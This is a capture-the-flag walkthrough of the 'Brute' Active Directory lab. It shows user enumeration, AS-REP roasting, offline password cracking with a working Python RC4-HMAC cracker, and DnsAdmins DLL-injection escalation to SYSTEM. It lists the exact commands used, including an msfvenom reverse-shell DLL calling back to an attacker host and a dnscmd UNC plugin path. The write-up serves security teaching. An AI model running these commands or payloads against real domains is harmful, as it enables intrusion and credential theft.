Premise

In this walkthrough we go over an Active Directory Windows machine on which we gained domain controller access by abusing the DnsAdmins group, of which a non-privileged user turned out to be a member.

The scenario shows how the many settings that Active Directory requires an administrator to configure leave room for misconfigurations (here, an account without Kerberos pre-authentication and an over-privileged group membership) that can be chained into full compromise of a domain controller.

Machine Name: Brute

Operating System: Windows Server with Active Directory

Difficulty: Medium

Created by: wtfitsaduck

Skills Learned

  • AS-REP Roasting
  • Kerbrute user enumeration
  • Privilege Escalation via DnsAdmins

Finding My Way In: Enumeration

I started by running an Nmap scan to see what ports were open and to get some basic information about the domain. This is always my first step, as it gives me a map of the network. I focused on Kerberos (port 88) and LDAP (port 389) to try and find some valid usernames.

My first attempt, an LDAP script, gave me no users, so I switched to Kerberos enumeration. This works because the KDC answers an AS-REQ for a name that does not exist with KDC_ERR_C_PRINCIPAL_UNKNOWN, and for a real account with KDC_ERR_PREAUTH_REQUIRED (or an AS-REP if pre-authentication is off), so usernames can be confirmed without attempting a logon. After a little trial and error with the command, I found several users, including "patrick", "malcolm", "administrator" and "test". I saved these usernames for later.

Getting a Foothold: AS-REP Roasting and Cracking

Next, I used Impacket's GetNPUsers.py to check whether any of these users had Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag on the account). When pre-authentication is off, anyone can request a TGT for that account without proving knowledge of the password, and the KDC returns an AS-REP whose encrypted part is keyed with the user's password-derived key, so it can be cracked offline. This is AS-REP roasting. Luckily for me, the "test" user had pre-authentication disabled, and I got its AS-REP hash.

With the hash in hand, I ran it through John the Ripper with the rockyou wordlist. It didn't take long to recover the password: "Unique1".
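To show what John is actually doing with that hash, here is an added example (not code from the original walkthrough or from the Impacket/John projects) that reimplements the offline check for an etype 23 (RC4-HMAC) AS-REP hash in GetNPUsers.py's $krb5asrep$23$ format. For each candidate password it derives the NT hash, derives the RC4-HMAC keys per RFC 4757, and tests the HMAC-MD5 checksum; a verifying checksum means the guess is right. It assumes key usage 8, the value hashcat and John apply to this hash type. The sample hash is constructed by the same routine with a fixed confounder and a stand-in plaintext, because a real KDC reply carries a random confounder and a DER-encoded EncASRepPart; the wordlist is also constructed.

```python
import hashlib
import hmac
import struct

AS_REP_USAGE = 8  # key-usage number hashcat/John apply to $krb5asrep$23$ hashes (assumption)


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = _lrot((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _lrot((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def rc4(key, data):
    """Plain RC4 keystream XOR (key scheduling + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password):
    """RC4-HMAC long-term key = MD4(UTF-16LE(password)), i.e. the NT hash."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key, data):
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, data); K3 = HMAC(K1, checksum)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_decrypt(key, usage, ciphertext):
    """Return the plaintext if the checksum verifies, else None (wrong key)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum, edata = ciphertext[:16], ciphertext[16:]
    data = rc4(_hmac_md5(k1, checksum), edata)
    if hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return data[8:]  # strip the 8-byte confounder
    return None


def parse_asrep_hash(line):
    """Split '$krb5asrep$23$user@REALM:<checksum hex>$<edata hex>' into (principal, ciphertext)."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) AS-REP hashes are handled here")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)


def crack_asrep(line, wordlist):
    """Offline guess: the candidate whose NT hash makes the AS-REP checksum verify."""
    _, ciphertext = parse_asrep_hash(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_USAGE, ciphertext) is not None:
            return candidate
    return None


def build_sample_asrep_hash(principal, password):
    """Constructed stand-in for a KDC reply (fixed confounder, fake EncASRepPart)."""
    plaintext = b"constructed EncASRepPart stand-in (session key, times, ...)"
    ct = rc4_hmac_encrypt(nt_hash(password), AS_REP_USAGE, plaintext, b"\x00" * 8)
    return f"$krb5asrep$23${principal}:{ct[:16].hex()}${ct[16:].hex()}"


SAMPLE_HASH = build_sample_asrep_hash("test@BRUTE.CSL", "Unique1")  # constructed
SAMPLE_WORDLIST = ["123456", "password", "Unique1", "letmein"]       # constructed
```

The cost per guess is one MD4 and three HMAC-MD5s, which is why RC4-HMAC AS-REPs crack so fast; accounts that only offer AES etypes (18200's AES sibling formats) force a PBKDF2 key derivation per guess and are far slower to attack.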

Getting a Shell: WinRM and DNS Admins

Now that I had a username and password, I used evil-winrm to get a shell over WinRM as the "test" user. This was my initial access, but I wanted full control of the system.

I checked the "test" user's group memberships and found it was a member of DnsAdmins. This was a huge win: on a domain controller the DNS Server service (dns.exe) runs as NT AUTHORITY\SYSTEM, and DnsAdmins members are allowed to set the server's ServerLevelPluginDll setting through dnscmd, which makes dns.exe load an arbitrary DLL the next time the service starts.

The Final Step: Malicious DLL and System Shell

To take advantage of this, I used msfvenom to create a malicious DLL file that would give me a reverse shell. I then set up a simple web server on my own machine to host this file.

From my shell on the "Brute" machine, I used dnscmd to point the DNS server's ServerLevelPluginDll setting at my DLL, then stopped and started the DNS service. Because the value is a UNC path, dns.exe fetches the DLL over SMB from my host when it starts, so the DLL has to be reachable at that share at that moment. As soon as the service started, it loaded my DLL and I got a reverse shell with full NT AUTHORITY\SYSTEM privileges. Two practical caveats: stopping and starting the service needs its own permission on the DNS service, which DnsAdmins membership alone does not guarantee, and the setting persists (the DLL runs on every service start) until the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters is removed, so clean it up afterwards.

Technical Commands I Used

Here are some of the key commands I used in the terminal during this penetration test:

  • Nmap Scans:
    • sudo nmap -p 389 --script ldap-search --script-args ldap-search.rootdn="DC=brute,DC=csl" 172.31.3.3
    • sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=brute.csl,userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt 172.31.3.3
  • Kerbrute:
    • ./kerbrute userenum -d brute.csl --dc 172.31.3.3 /usr/share/wordlists/seclists/Usernames/Names/names.txt
  • Impacket's GetNPUsers.py:
    • sudo python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py brute.csl/ -dc-ip 172.31.3.3 -usersfile users.txt -format john
  • John the Ripper:
    • john --wordlist=/usr/share/wordlists/rockyou.txt hashes
  • Evil-WinRM:
    • evil-winrm -i 172.31.3.3 -u test -p Unique1
  • Windows Commands:
    • net group "Domain Admins" /domain
    • dnscmd /config /serverlevelplugindll \\10.0.0.7\share\dnsdll.dll
    • net stop dns
    • net start dns
  • Msfvenom:
    • sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.7 LPORT=4545 -f dll -o dnsdll.dll
  • Python HTTP Server:
    • sudo python3 -m http.server 80

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.